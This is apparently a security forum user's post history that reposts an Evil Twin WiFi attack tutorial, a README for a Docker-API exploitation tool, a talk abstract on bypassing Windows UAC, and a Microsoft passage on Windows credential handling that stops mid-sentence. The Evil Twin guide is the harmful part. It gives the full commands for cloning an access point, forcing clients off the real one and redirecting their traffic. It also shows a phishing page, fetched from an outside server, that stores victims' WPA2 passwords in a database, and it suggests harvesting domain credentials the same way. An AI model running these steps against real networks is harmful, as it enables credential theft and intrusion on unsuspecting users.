-
Posts
18740 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
Evil Twin Attack: The Definitive Guide by Hardeep Singh Last updated Feb. 10, 2019 In this article I’ll show you how an attacker can retrieve cleartext WPA2 passphrase on automation using an Evil Twin Access Point. No need of cracking or any extra hardware other than a Wireless adapter. I am using a sample web page for the demonstration. An attacker can turn this webpage into basically any webapp to steal information. Information like domain credentials, social login passwords, credit card information etc. ET Evil Twin noun Definition A fraudulent wireless access point masquerading as a legitimate AP. Evil Twin Access Point’s sole purpose is to eavesdrop on WiFi users to steal personal or corporate information without user’s knowledge. We will not be using any automated script, rather we will understand the concept and perform it manually so that you can make your own script to automate the task and make it simple and usable on low-end devices. Lets begin now! Download All 10 Chapters of WiFi Pentesting and Security Book… PDF version contains all of the content and resources found in the web-based guide Evil Twin Attack Methodology Step 1: Attacker scans the air for the target access point information. Information like SSID name, Channel number, MAC Address. He then uses that information to create an access point with same characteristics, hence Evil Twin Attack. Step 2: Clients on the legitimate AP are repeatedly disconnected, forcing users to connect to the fraudulent access point. Step 3: As soon as the client is connected to the fake access point, S/he may start browsing Internet. Step 4: Client opens up a browser window and see a web administrator warning saying “Enter WPA password to download and upgrade the router firmware” Step 5: The moment client enters the password, s/he will be redirected to a loading page and the password is stored in the MySQL database of the attacker machine. The persistent storage and active deauthentication makes this attack automated. An attacker can also abuse this automation by simply changing the webpage. Imagine the same WPA2 password warning is replaced by “Enter domain credentials to access network resources”. The fake AP will be up all time and storing legitimate credentials in persistent storage. I’ll discuss about it in my Captive Portal Guide. Where I’ll demonstrate how an attacker can even hack domain credentials without having a user to open a webpage. Just connecting the WiFi can take a WiFi user to our webpage, automatically. A WiFi user could be using Android, iOS, a MacOS or a windows laptop. Almost every device is susceptible to it. but for now I’ll show you how the attack works with lesser complications. Tweet this Evil Twin Attack Guide Prerequisites Below are the following list of hardware and software used in creating this article. Use any hardware of your choice until it supports the softwares you’d be using. Hardware used: A Laptop (4GB RAM, Intel i5 processor) Alfa AWUS036NH 1W wireless adapter Huawei 3G WiFi dongle for Internet connection to the Kali Virtual Machine Software Used VMWare Workstation/Fusion 2019 Kali Linux 2019 (Attacker) Airmon-ng, airodump-ng, airbase-ng, and aireplay-ng DNSmasq Iptables Apache, mysql Firefox web browser on Ubuntu 16.10 (Victim) Installing required tools So far we have aircrack-ng suite of tools, apache, mysql, iptables pre-installed in our Kali Linux virtual machine. We just need to install dnsmasq for IP address allocation to the client. Install dnsmasq in Kali Linux Type in terminal: apt-get update apt-get install dnsmasq -y This will update the cache and install latest version of dhcp server in your Kali Linux box. Now all the required tools are installed. We need to configure apache and the dhcp server so that the access point will allocate IP address to the client/victim and client would be able to access our webpage remotely. Now we will define the IP range and the subnet mask for the dhcp server. Configure dnsmasq Create a configuration file for dnsmasq using vim or your favourite text editor and add the following code. sudo vi ~/Desktop/dnsmasq.conf ~/Desktop/dnsmasq.conf interface=at0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1 Save and exit. Use your desired name for .conf file. Pro Tip: Replace at0 with wlan0 everywhere when hostapd is used for creating an access point Parameter Breakdown dhcp-range=10.0.0.10,10.0.0.250,12h: Client IP address will range from 10.0.0.10 to 10.0.0.250 and default lease time is 12 hours. dhcp-option=3,10.0.0.1: 3 is code for Default Gateway followed by IP of D.G i.e. 10.0.0.1 dhcp-option=6,10.0.0.1: 6 for DNS Server followed by IP address (Optional) Resolve airmon-ng and Network Manager Conflict Before enabling monitor mode on the wireless card let’s fix the airmon-ng and network-manager conflict forever. So that we don’t need to kill the network-manager or disconnect tany network connection before putting wireless adapter into monitor mode as we used to run airmon-ng check kill every time we need to start wifi pentest. Open network manager’s configuration file and put the MAC address of the device you want network-manager to stop managing: vim /etc/NetworkManager/NetworkManager.conf Now add the following at the end of the file [keyfile] unmanaged-devices:mac=AA:BB:CC:DD:EE:FF, A2:B2:C2:D2:E2:F2 Now that you have edited the NetworkManager.conf file you should have no conflicts with airmon-ng in Kali Linux We are ready to begin now. Put wireless adapter into monitor mode Bring up the wireless interface ifconfig wlan0 up airmon-ng start wlan0 Putting the card in monitor mode will show a similar output Now our card is in monitor mode without any issues with network manager. You can simply start monitoring the air with command airodump-ng wlan0mon As soon your target AP appears in the airodump-ng output window press CTRL+C and note these three things in a text editor: vi info.txt Set tx-power of alfa card to max: 1000mW tx-power stands for transmission power. By default it is set to 20dBm(Decibel metre) or 100mW. tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table. If your country is set to US while installation. then your card should operate on 30 dBm(1000 mW) ifconfig wlan0mon down iw reg set US ifconfig wlan0mon up iwconfig wlan0mon If you are thinking why we need to change region to operate our card at 1000mW. Here is why because different countries have different legal allowance of Wireless devices at certain power and frequency. That is why Linux distribution have this information built in and you need to change your region to allow yourself to operate at that frequency and power. Motive of powering up the card is that when creating the hotspot you do not have any need to be near to the victim. victim device will automatically connect to the device with higher signal strength even if it isn’t physically near. Start Evil Twin Attack Begin the Evil Twin attack using airbase-ng: airbase-ng -e "rootsh3ll" -c 1 wlan0mon by default airbase-ng creates a tap interface(at0) as the wired interface for bridging/routing the network traffic via the rogue access point. you can see it using ifconfig at0 command. For the at0 to allocate IP address we need to assign an IP range to itself first. Allocate IP and Subnet Mask ifconfig at0 10.0.0.1 up Note: The Class A IP address, 10.0.0.1, matches the dhcp-option parameter of dnsmasq.conf file. Which means at0 will act as the default gateway under dnsmasq Now we will use our default Internet facing interface, eth0, to route all the traffic from the client through it. In other words, allowing victim to access the internet and allowing ourselves(attacker) to sniff that traffic. For that we will use iptables utility to set a firewall rule to route all the traffic through at0 exclusively. You will get a similar output, if using VM Enable NAT by setting Firewall rules in iptables Enter the following commands to set-up an actual NAT: iptables --flush iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80 iptables -t nat -A POSTROUTING -j MASQUERADE Make sure you enter correct interface for –out-interface. eth0 here is the upstream interface where we want to send out packets, coming from at0 interface(rogue AP). Rest is fine. After entering the above command if you are willing to provide Internet access to the victim just enable routing using the command below Enable IP forwarding echo 1 > /proc/sys/net/ipv4/ip_forward Entering “1” in the ip_forward file will tell the system to enable the rules defined in the IPtables and start forwarding traffic(if any). 0 stand for disable. Although rules will remain defined until next reboot. We will put it 0 for this attack, as we are not providing internet access before we get the WPA password. Our Evil Twin attack is now ready and rules has been enabled, now we will start the dhcp server to allow fake AP to allocate IP address to the clients. First we need to tell dhcp server the location of the file we created earlier, which defines IP class, subnet mask and range of the network. Start dhcpd Listener Type in terminal: dnsmasq -C ~/Desktop/dnsmasq.conf -d Here -C stands for Configuration file and -d stands for daemon mode as soon as victim connects you should see similar output for dnsmasq Terminal window [ dnsmasq ] dnsmasq: started, version 2.76 cachesize 150 dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth DNSSEC loop-detect inotify dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h dnsmasq: using nameserver 8.8.8.8#53 dnsmasq: reading /etc/resolv.conf dnsmasq: using nameserver 8.8.8.8#53 dnsmasq: using nameserver 192.168.74.2#53 dnsmasq: read /etc/hosts - 5 addresses dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250 dnsmasq-dhcp: 1673205542 client provides name: rootsh3ll-iPhone dnsmasq-dhcp: 1673205542 DHCPDISCOVER(at0) 2c:33:61:3d:c4:2e dnsmasq-dhcp: 1673205542 tags: at0 dnsmasq-dhcp: 1673205542 DHCPOFFER(at0) 10.0.0.247 2c:33:61:3a:c4:2f dnsmasq-dhcp: 1673205542 requested options: 1:netmask, 121:classless-static-route, 3:router, <-----------------------------------------SNIP-----------------------------------------> dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250 In case you are facing any issue regarding dhcp server, just kill the curently running dhcp processes killall dnsmasq dhcpd isc-dhcp-server and run dnsmasq again. It should work now. Start the Services Now start the dhcp server, apache and mysql inline /etc/init.d/apache2 start /etc/init.d/mysql start We have our Evil Twin attack vector up and working perfectly. Now we need to setup our fake webpage in action so that victim will see the webpage while browsing and enter the passphrase which s/he uses for his/her access point. Download Rogue AP Configuration Files wget https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip and simply enter the following command in Terminal unzip rogue_AP.zip -d /var/www/html/ This command will extract the contents of rogue_AP.zip file and copy them to the apache’s html directory so that when the victim opens the browser s/he will automatically be redirected to the default index.html webpage. Now to store the credentials entered by the victim in the html page, we need an SQL database. you will see a dbconnect.php file for that, but to be in effect you need a database created already so that the dbconnect.php will reflect the changes in the DB. Open terminal and type: mysql -u root -p Create a new user fakeap and password fakeap As you cannot execute MySQL queries from PHP being a root user since version 5.7 create user fakeap@localhost identified by 'fakeap'; now create database and table as defined in the dbconnect.php create database rogue_AP; use rogue_AP; create table wpa_keys(password1 varchar(32), password2 varchar(32)); It should go like this: Grant fakeap all the permissions on rogue_AP Database: grant all privileges on rogue_AP.* to 'fakeap'@'localhost'; Exit and log in using new user mysql -u fakeap -p Select rogue_AP database use rogue_AP; Insert a test value in the table insert into wpa_keys(password1, password2) values ("testpass", "testpass"); select * from wpa_keys; Note that both the values are same here, that means password and confirmation password should be the same. Our attack is now ready just wait for the client to connect and see the credential coming. In some cases your client might already be connected to the original AP. You need to disconnect the client as we did in the previous chapters using aireplay-ng utility. Syntax: aireplay-ng --deauth 0 -a <BSSID> <Interface> aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon --deauth 0: Unlimited de-authentication requests. Limit the request by entering natural numbers. We are using 0 so that every client will disconnect from that specific BSSID and connect to our AP as it is of the same name as of real AP and also open type access point. As soon a client connects to your AP you will see an activity in the airbase-ng terminal window like this Now to simulate the client side I am using Ubuntu machine connected via WiFi and using a Firefox web browser to illustrate the attack. Victim can now access the Internet. You can do 2 things at this staged: Sniff the client traffic Redirect all the traffic to the fake AP page and that’s what we wanna do. Redirect the client to our fake AP page. Just run this command: dnsspoof -i at0 It will redirect all HTTP traffic coming from the at0 interface. Not HTTPS traffic, due to the built in list of HSTS web sites. You can’t redirect HTPS traffic without getting an SSL/TLS error on the victim’s machine. When victim tries to access any website(google.com in this case), s/he will see this page which tell the victim to enter the password to download and upgrade the firmware Here i am entering “iamrootsh3ll” as the password that I (Victim) think is his/her AP’s password. As soon as the victim presses [ENTER] s/he will see this Now coming back to attacker side. You need to check in the mySQL database for the stored passwords. Just type the previously used command in the mySQL terminal window and see whether a new update is there or not. After simulating I checked the mySQL DB and here is the output Voila! you have successfully harvested the WPA2 passphrase, right from the victim, in plain text. Now close all the terminal windows and connect back to the real AP to check whether the password is correct or victim was him/herself was a hacker and tricked you! Although you don’t need to name any AP similar to an existing AP you can also create a random free open WiFi type name to gather the client on your AP and start pentesting. Download All 10 Chapters of WiFi Pentesting and Security Book… PDF version contains all of the content and resources found in the web-based guide Want to go even deeper? If you are serious about WiFi Penetration Testing and Security, I have something for you. WiFi Hacking in the Cloud Video Course. Which will take you from a complete beginner to a full blown blue teamer who can not only pentest a WiFi network but can also detect rogue devices on a network, detect network anomalies, perform threat detection on multiple networks at once, create email reports, visual dashboard for easier understanding, incident handling and respond to the Security Operations Center. Apart from that, USP of the course? WiFi Hacking without a WiFi card – A.K.A The Cloud Labs The cloud labs allows you to simply log into your Kali machine and start sniffing WiFi traffic. perform low and high level WiFi attacks, learn all about WiFi security, completely on your lab. WiFi Hacking Without a WiFi Card – Proof of Concept Labs can be accessed in 2 ways 1. Via Browser – Just use your login link and password associated 2. Via SSH -If you want even faster and latency free experience. Here’s a screenshot of the GUI lab running in Chrome browser (Note the URL, it’s running on Amazon AWS cloud): Click here to learn all about the WiFi Security Video Course. Order now for a discount Keep Learning… Sursa: https://rootsh3ll.com/evil-twin-attack/
-
- 3
-
-
-
-
Gorsair Gorsair is a penetration testing tool for discovering and remotely accessing Docker APIs from vulnerable Docker containers. Once it has access to the docker daemon, you can use Gorsair to directly execute commands on remote containers. Exposing the docker API on the internet is a tremendous risk, as it can let malicious agents get information on all of the other containers, images and system, as well as potentially getting privileged access to the whole system if the image uses the root user. Command line options -t, --targets: Set targets according to the nmap target format. Required. Example: --targets="192.168.1.72,192.168.1.74" -p, --ports: (Default: 2375,2376) Set custom ports. -s, --speed: (Default: 4) Set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. You might also want to keep it low to keep your discovery stealthy. See this for more info on the nmap timing templates. -v, --verbose: Enable more verbose logs. -D, --decoys: List of decoy IP addresses to use (see the decoy section of the nmap documentation) -e, --interface: Network interface to use --proxies: List of HTTP/SOCKS4 proxies to use to deplay connections with (see documentation) -S, --spoof-ip: IP address to use for IP spoofing --spoof-mac: MAC address to use for MAC spoofing -v, --verbose: Enable verbose logging -h, --help: Display the usage information How can I protect my containers from this attack Avoid putting containers that have access to the docker socket on the internet Avoid using the root account in docker containers Sursa: https://github.com/Ullaakut/Gorsair
-
- 2
-
-
ZeroNights Publicat pe 19 ian. 2018 UAC, specifically Admin-Approval mode, has been known to be broken ever since it was first released in Windows Vista. Most of the research of bypassing UAC has focused on abusing bad elevated application behavior, auto elevation or shared registry and file resources. However, UAC was fundamentally broken from day one due to the way Microsoft implemented the security around elevated processes, especially their access tokens. This presentation will go into depth on why this technique works, allowing you to silently gain administrator privileges if a single elevated application is running. It will describe how Microsoft tried to fix it in Windows 10, and how you can circumvent their defences. It will also go into detail on a previously undocumented technique to abuse the assumed, more secure, Over-The-Shoulder elevation on Windows 10. Slides - https://2017.zeronights.org/wp-conten...
-
Credentials Processes in Windows Authentication 10/12/2016 26 minutes to read Contributors Applies To: Windows Server (Semi-Annual Channel), Windows Server 2016 This reference topic for the IT professional describes how Windows authentication processes credentials. Windows credentials management is the process by which the operating system receives the credentials from the service or user and secures that information for future presentation to the authenticating target. In the case of a domain-joined computer, the authenticating target is the domain controller. The credentials used in authentication are digital documents that associate the user's identity to some form of proof of authenticity, such as a certificate, a password, or a PIN. By default, Windows credentials are validated against the Security Accounts Manager (SAM) database on the local computer, or against Active Directory on a domain-joined computer, through the Winlogon service. Credentials are collected through user input on the logon user interface or programmatically via the application programming interface (API) to be presented to the authenticating target. Local security information is stored in the registry under HKEY_LOCAL_MACHINE\SECURITY. Stored information includes policy settings, default security values, and account information, such as cached logon credentials. A copy of the SAM database is also stored here, although it is write-protected. The following diagram shows the components that are required and the paths that credentials take through the system to authenticate the user or process for a successful logon. The following table describes each component that manages credentials in the authentication process at the point of logon. Authentication components for all systems Component Description User logon Winlogon.exe is the executable file responsible for managing secure user interactions. The Winlogon service initiates the logon process for Windows operating systems by passing the credentials collected by user action on the secure desktop (Logon UI) to the Local Security Authority (LSA) through Secur32.dll. Application logon Application or service logons that do not require interactive logon. Most processes initiated by the user run in user mode by using Secur32.dll whereas processes initiated at startup, such as services, run in kernel mode by using Ksecdd.sys. For more information about user mode and kernel mode, see Applications and User Mode or Services and Kernel Mode in this topic. Secur32.dll The multiple authentication providers that form the foundation of the authentication process. Lsasrv.dll The LSA Server service, which both enforces security policies and acts as the security package manager for the LSA. The LSA contains the Negotiate function, which selects either the NTLM or Kerberos protocol after determining which protocol is to be successful. Security Support Providers A set of providers that can individually invoke one or more authentication protocols. The default set of providers can change with each version of the Windows operating system, and custom providers can be written. Netlogon.dll The services that the Net Logon service performs are as follows: - Maintains the computer's secure channel (not to be confused with Schannel) to a domain controller. - Passes the user's credentials through a secure channel to the domain controller and returns the domain security identifiers (SIDs) and user rights for the user. - Publishes service resource records in the Domain Name System (DNS) and uses DNS to resolve names to the Internet Protocol (IP) addresses of domain controllers. - Implements the replication protocol based on remote procedure call (RPC) for synchronizing primary domain controllers (PDCs) and backup domain controllers (BDCs). Samsrv.dll The Security Accounts Manager (SAM), which stores local security accounts, enforces locally stored policies and supports APIs. Registry The Registry contains a copy of the SAM database, local security policy settings, default security values, and account information that is only accessible to the system. This topic contains the following sections: Credential input for user logon Credential input for application and service logon Local Security Authority Cached credentials and validation Credential storage and validation Security Accounts Manager database Local domains and trusted domains Certificates in Windows authentication Credential input for user logon In Windows Server 2008 and Windows Vista, the Graphical Identification and Authentication (GINA) architecture was replaced with a credential provider model, which made it possible to enumerate different logon types through the use of logon tiles. Both models are described below. Graphical Identification and Authentication architecture The Graphical Identification and Authentication (GINA) architecture applies to the Windows Server 2003, Microsoft Windows 2000 Server, Windows XP, and Windows 2000 Professional operating systems. In these systems, every interactive logon session creates a separate instance of the Winlogon service. The GINA architecture is loaded into the process space used by Winlogon, receives and processes the credentials, and makes the calls to the authentication interfaces through LSALogonUser. The instances of Winlogon for an interactive logon run in Session 0. Session 0 hosts system services and other critical processes, including the Local Security Authority (LSA) process. The following diagram shows the credential process for Windows Server 2003, Microsoft Windows 2000 Server, Windows XP, and Microsoft Windows 2000 Professional. Credential provider architecture The credential provider architecture applies to those versions designated in the Applies To list at the beginning of this topic. In these systems, the credentials input architecture changed to an extensible design by using credential providers. These providers are represented by the different logon tiles on the secure desktop that permit any number of logon scenarios - different accounts for the same user and different authentication methods, such as password, smart card, and biometrics. With the credential provider architecture, Winlogon always starts Logon UI after it receives a secure attention sequence event. Logon UI queries each credential provider for the number of different credential types the provider is configured to enumerate. Credential providers have the option of specifying one of these tiles as the default. After all providers have enumerated their tiles, Logon UI displays them to the user. The user interacts with a tile to supply their credentials. Logon UI submits these credentials for authentication. Credential providers are not enforcement mechanisms. They are used to gather and serialize credentials. The Local Security Authority and authentication packages enforce security. Credential providers are registered on the computer and are responsible for the following: Describing the credential information required for authentication. Handling communication and logic with external authentication authorities. Packaging credentials for interactive and network logon. Packaging credentials for interactive and network logon includes the process of serialization. By serializing credentials multiple logon tiles can be displayed on the logon UI. Therefore, your organization can control the logon display such as users, target systems for logon, pre-logon access to the network and workstation lock/unlock policies - through the use of customized credential providers. Multiple credential providers can co-exist on the same computer. Single sign-on (SSO) providers can be developed as a standard credential provider or as a Pre-Logon-Access Provider. Each version of Windows contains one default credential provider and one default Pre-Logon-Access Provider (PLAP), also known as the SSO provider. The SSO provider permits users to make a connection to a network before logging on to the local computer. When this provider is implemented, the provider does not enumerate tiles on Logon UI. A SSO provider is intended to be used in the following scenarios: Network authentication and computer logon are handled by different credential providers. Variations to this scenario include: A user has the option of connecting to a network, such as connecting to a virtual private network (VPN), before logging on to the computer but is not required to make this connection. Network authentication is required to retrieve information used during interactive authentication on the local computer. Multiple network authentications are followed by one of the other scenarios. For example, a user authenticates to an Internet service provider (ISP), authenticates to a VPN, and then uses their user account credentials to log on locally. Cached credentials are disabled, and a Remote Access Services connection through VPN is required before local logon to authenticate the user. A domain user does not have a local account set up on a domain-joined computer and must establish a Remote Access Services connection through VPN connection before completing interactive logon. Network authentication and computer logon are handled by the same credential provider. In this scenario, the user is required to connect to the network before logging on to the computer. Logon tile enumeration The credential provider enumerates logon tiles in the following instances: For those operating systems designated in the Applies to list at the beginning of this topic. The credential provider enumerates the tiles for workstation logon. The credential provider typically serializes credentials for authentication to the local security authority. This process displays tiles specific for each user and specific to each user's target systems. The logon and authentication architecture lets a user use tiles enumerated by the credential provider to unlock a workstation. Typically, the currently logged-on user is the default tile, but if more than one user is logged on, numerous tiles are displayed. The credential provider enumerates tiles in response to a user request to change their password or other private information, such as a PIN. Typically, the currently logged-on user is the default tile; however, if more than one user is logged on, numerous tiles are displayed. The credential provider enumerates tiles based on the serialized credentials to be used for authentication on remote computers. Credential UI does not use the same instance of the provider as the Logon UI, Unlock Workstation, or Change Password. Therefore, state information cannot be maintained in the provider between instances of Credential UI. This structure results in one tile for each remote computer logon, assuming the credentials have been correctly serialized. This scenario is also used in User Account Control (UAC), which can help prevent unauthorized changes to a computer by prompting the user for permission or an administrator password before permitting actions that could potentially affect the computer's operation or that could change settings that affect other users of the computer. The following diagram shows the credential process for the operating systems designated in the Applies To list at the beginning of this topic. Credential input for application and service logon Windows authentication is designed to manage credentials for applications or services that do not require user interaction. Applications in user mode are limited in terms of what system resources they have access to, while services can have unrestricted access to the system memory and external devices. System services and transport-level applications access an Security Support Provider (SSP) through the Security Support Provider Interface (SSPI) in Windows, which provides functions for enumerating the security packages available on a system, selecting a package, and using that package to obtain an authenticated connection. When a client/server connection is authenticated: The application on the client side of the connection sends credentials to the server by using the SSPI function InitializeSecurityContext (General). The application on the server side of the connection responds with the SSPI function AcceptSecurityContext (General). The SSPI functions InitializeSecurityContext (General) and AcceptSecurityContext (General) are repeated until all the necessary authentication messages have been exchanged to either succeed or fail authentication. After the connection has been authenticated, the LSA on the server uses information from the client to build the security context, which contains an access token. The server can then call the SSPI function ImpersonateSecurityContext to attach the access token to an impersonation thread for the service. Applications and user mode User mode in Windows is composed of two systems capable of passing I/O requests to the appropriate kernel-mode drivers: the environment system, which runs applications written for many different types of operating systems, and the integral system, which operates system-specific functions on behalf of the environment system. The integral system manages operating system'specific functions on behalf of the environment system and consists of a security system process (the LSA), a workstation service, and a server service. The security system process deals with security tokens, grants or denies permissions to access user accounts based on resource permissions, handles logon requests and initiates logon authentication, and determines which system resources the operating system needs to audit. Applications can run in user mode where the application can run as any principal, including in the security context of Local System (SYSTEM). Applications can also run in kernel mode where the application can run in the security context of Local System (SYSTEM). SSPI is available through the Secur32.dll module, which is an API used for obtaining integrated security services for authentication, message integrity, and message privacy. It provides an abstraction layer between application-level protocols and security protocols. Because different applications require different ways of identifying or authenticating users and different ways of encrypting data as it travels across a network, SSPI provides a way to access dynamic-link libraries (DLLs) that contain different authentication and cryptographic functions. These DLLs are called Security Support Providers (SSPs). Managed service accounts and virtual accounts were introduced in Windows Server 2008 R2 and Windows 7 to provide crucial applications, such as Microsoft SQL Server and Internet Information Services (IIS), with the isolation of their own domain accounts, while eliminating the need for an administrator to manually administer the service principal name (SPN) and credentials for these accounts. For more information about these features and their role in authentication, see Managed Service Accounts Documentation for Windows 7 and Windows Server 2008 R2 and Group Managed Service Accounts Overview. Services and kernel mode Even though most Windows applications run in the security context of the user who starts them, this is not true of services. Many Windows services, such as network and printing services, are started by the service controller when the user starts the computer. These services might run as Local Service or Local System and might continue to run after the last human user logs off. Note Services normally run in security contexts known as Local System (SYSTEM), Network Service, or Local Service. Windows Server 2008 R2 introduced services that run under a managed service account, which are domain principals. Before starting a service, the service controller logs on by using the account that is designated for the service, and then presents the service's credentials for authentication by the LSA. The Windows service implements a programmatic interface that the service controller manager can use to control the service. A Windows service can be started automatically when the system is started or manually with a service control program. For example, when a Windows client computer joins a domain, the messenger service on the computer connects to a domain controller and opens a secure channel to it. To obtain an authenticated connection, the service must have credentials that the remote computer's Local Security Authority (LSA) trusts. When communicating with other computers in the network, LSA uses the credentials for the local computer's domain account, as do all other services running in the security context of the Local System and Network Service. Services on the local computer run as SYSTEM so credentials do not need to be presented to the LSA. The file Ksecdd.sys manages and encrypts these credentials and uses a local procedure call into the LSA. The file type is DRV (driver) and is known as the kernel-mode Security Support Provider (SSP) and, in those versions designated in the Applies To list at the beginning of this topic, is FIPS 140-2 Level 1-compliant. Kernel mode has full access to the hardware and system resources of the computer. The kernel mode stops user-mode services and applications from accessing critical areas of the operating system that they should not have access to. Local Security Authority The Local Security Authority (LSA) is a protected system process that authenticates and logs users on to the local computer. In addition, LSA maintains information about all aspects of local security on a computer (these aspects are collectively known as the local security policy), and it provides various services for translation between names and security identifiers (SIDs). The security system process, Local Security Authority Server Service (LSASS), keeps track of the security policies and the accounts that are in effect on a computer system. The LSA validates a user's identity based on which of the following two entities issued the user's account: Local Security Authority. The LSA can validate user information by checking the Security Accounts Manager (SAM) database located on the same computer. Any workstation or member server can store local user accounts and information about local groups. However, these accounts can be used for accessing only that workstation or computer. Security authority for the local domain or for a trusted domain. The LSA contacts the entity that issued the account and requests verification that the account is valid and that the request originated from the account holder. The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. The stored credentials let users seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service. LSASS can store credentials in multiple forms, including: Reversibly encrypted plaintext Kerberos tickets (ticket-granting tickets (TGTs), service tickets) NT hash LAN Manager (LM) hash If the user logs on to Windows by using a smart card, LSASS does not store a plaintext password, but it stores the corresponding NT hash value for the account and the plaintext PIN for the smart card. If the account attribute is enabled for a smart card that is required for interactive logon, a random NT hash value is automatically generated for the account instead of the original password hash. The password hash that is automatically generated when the attribute is set does not change. If a user logs on to a Windows-based computer with a password that is compatible with LAN Manager (LM) hashes, this authenticator is present in memory. The storage of plaintext credentials in memory cannot be disabled, even if the credential providers that require them are disabled. The stored credentials are directly associated with the Local Security Authority Subsystem Service (LSASS) logon sessions that have been started after the last restart and have not been closed. For example, LSA sessions with stored LSA credentials are created when a user does any of the following: Logs on to a local session or Remote Desktop Protocol (RDP) session on the computer Runs a task by using the RunAs option Runs an active Windows service on the computer Runs a scheduled task or batch job Runs a task on the local computer by using a remote administration tool In some circumstances, the LSA secrets, which are secret pieces of data that are accessible only to SYSTEM account processes, are stored on the hard disk drive. Some of these secrets are credentials that must persist after reboot, and they are stored in encrypted form on the hard disk drive. Credentials stored as LSA secrets might include: Account password for the computer's Active Directory Domain Services (AD DS) account Account passwords for Windows services that are configured on the computer Account passwords for configured scheduled tasks Account passwords for IIS application pools and websites Passwords for Microsoft accounts Introduced in Windows 8.1, the client operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This protection increases security for the credentials that the LSA stores and manages. For more information about these additional protections, see Configuring Additional LSA Protection. Cached credentials and validation Validation mechanisms rely on the presentation of credentials at the time of logon. However, when the computer is disconnected from a domain controller, and the user is presenting domain credentials, Windows uses the process of cached credentials in the validation mechanism. Each time a user logs on to a domain, Windows caches the credentials supplied and stores them in the security hive in the registry of the operation system. With cached credentials, the user can log on to a domain member without being connected to a domain controller within that domain. Credential storage and validation It is not always desirable to use one set of credentials for access to different resources. For example, an administrator might want to use administrative rather than user credentials when accessing a remote server. Similarly, if a user accesses external resources, such as a bank account, he or she can only use credentials that are different than their domain credentials. The following sections describe the differences in credential management between current versions of Windows operating systems and the Windows Vista and Windows XP operating systems. Remote logon credential processes The Remote Desktop Protocol (RDP) manages the credentials of the user who connects to a remote computer by using the Remote Desktop Client, which was introduced in Windows 8. The credentials in plaintext form are sent to the target host where the host attempts to perform the authentication process, and, if successful, connects the user to allowed resources. RDP does not store the credentials on the client, but the user's domain credentials are stored in the LSASS. Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account. Automatic restart sign-on credential process When a user signs in on a Windows 8.1 device, LSA saves the user credentials in encrypted memory that are accessible only by LSASS.exe. When Windows Update initiates an automatic restart without user presence, these credentials are used to configure Autologon for the user. On restart, the user is automatically signed in via the Autologon mechanism, and then the computer is additionally locked to protect the user's session. The locking is initiated through Winlogon whereas the credential management is done by LSA. By automatically signing in and locking the user's session on the console, the user's lock screen applications is restarted and available. For more information about ARSO, see Winlogon Automatic Restart Sign-On (ARSO). Stored user names and passwords in Windows Vista and Windows XP In Windows Server 2008 , Windows Server 2003, Windows Vista, and Windows XP, Stored User Names and Passwords in Control Panel simplifies the management and use of multiple sets of logon credentials, including X.509 certificates used with smart cards and Windows Live credentials (now called Microsoft account). The credentials - part of the user's profile - are stored until needed. This action can increase security on a per-resource basis by ensuring that if one password is compromised, it does not compromise all security. After a user logs on and attempts to access additional password-protected resources, such as a share on a server, and if the user's default logon credentials are not sufficient to gain access, Stored User Names and Passwords is queried. If alternate credentials with the correct logon information have been saved in Stored User Names and Passwords, these credentials are used to gain access. Otherwise, the user is prompted to supply new credentials, which can then be saved for reuse, either later in the logon session or during a subsequent session. The following restrictions apply: If Stored User Names and Passwords contains invalid or incorrect credentials for a specific resource, access to the resource is denied, and the Stored User Names and Passwords dialog box does not appear. Stored User Names and Passwords stores credentials only for NTLM, Kerberos protocol, Microsoft account (formerly Windows Live ID), and Secure Sockets Layer (SSL) authentication. Some versions of Internet Explorer maintain their own cache for basic authentication. These credentials become an encrypted part of a user's local profile in the \Documents and Settings\Username\Application Data\Microsoft\Credentials directory. As a result, these credentials can roam with the user if the user's network policy supports Roaming User Profiles. However, if the user has copies of Stored User Names and Passwords on two different computers and changes the credentials that are associated with the resource on one of these computers, the change is not propagated to Stored User Names and Passwords on the second computer. Windows Vault and Credential Manager Credential Manager was introduced in Windows Server 2008 R2 and Windows 7 as a Control Panel feature to store and manage user names and passwords. Credential Manager lets users store credentials relevant to other systems and websites in the secure Windows Vault. Some versions of Internet Explorer use this feature for authentication to websites. Credential management by using Credential Manager is controlled by the user on the local computer. Users can save and store credentials from supported browsers and Windows applications to make it convenient when they need to sign in to these resources. Credentials are saved in special encrypted folders on the computer under the user's profile. Applications that support this feature (through the use of the Credential Manager APIs), such as web browsers and apps, can present the correct credentials to other computers and websites during the logon process. When a website, an application, or another computer requests authentication through NTLM or the Kerberos protocol, a dialog box appears in which you select the Update Default Credentials or Save Password check box. This dialog box that lets a user save credentials locally is generated by an application that supports the Credential Manager APIs. If the user selects the Save Password check box, Credential Manager keeps track of the user's user name, password, and related information for the 